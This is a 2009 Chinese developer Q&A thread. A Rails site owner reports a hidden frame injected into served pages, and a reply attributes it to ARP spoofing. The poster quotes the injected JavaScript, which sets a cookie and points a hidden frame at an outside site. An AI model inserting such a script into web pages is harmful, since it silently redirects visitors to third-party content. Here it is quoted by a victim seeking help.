weixin_42319174 2009-07-11 16:34
浏览 210
已采纳

ror程序疑被植入恶意代码

环境:linux+lighttpd+fastcgi+ruby on rails(ruby 1.8.6 p279,rails 2.0.2)
在服务器上部署后,打开网页,发现在浏览器下方出现一个frame框,浏览源代码,发现一段新加的JS代码,链接到一个站长统计的网站,程序代码检查过没有被修改,不知道是否是服务器有漏洞被攻击了还是什么原因,有人有类似的经历或者哪位大侠告知一下原因和解决方法,不胜感激!
[b]问题补充:[/b]
恶意代码如下:


function showme() { var CK=document.cookie; var sa=CK.indexOf("CK"); if(sa!=-1){}else{var EP=new Date(); EP.setTime(EP.getTime()+24*60*60*1000); document.cookie="CK=test;expires="+EP.toGMTString(); self.hi.location="http://benpao2020.com/aa/a2.htm?1";} }





我对ARP攻击不甚了解,不知道有什么解决方法没有,感谢不吝赐教!

  • 写回答

3条回答 默认 最新

  • qichunren 2009-07-13 11:43
    关注

    解决了arp,恶意代码就会没有了。

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

悬赏问题

  • ¥15 GDI处理通道视频时总是带有白色锯齿
  • ¥20 用雷电模拟器安装百达屋apk一直闪退
  • ¥15 算能科技20240506咨询(拒绝大模型回答)
  • ¥15 自适应 AR 模型 参数估计Matlab程序
  • ¥100 角动量包络面如何用MATLAB绘制
  • ¥15 merge函数占用内存过大
  • ¥15 Revit2020下载问题
  • ¥15 使用EMD去噪处理RML2016数据集时候的原理
  • ¥15 神经网络预测均方误差很小 但是图像上看着差别太大
  • ¥15 单片机无法进入HAL_TIM_PWM_PulseFinishedCallback回调函数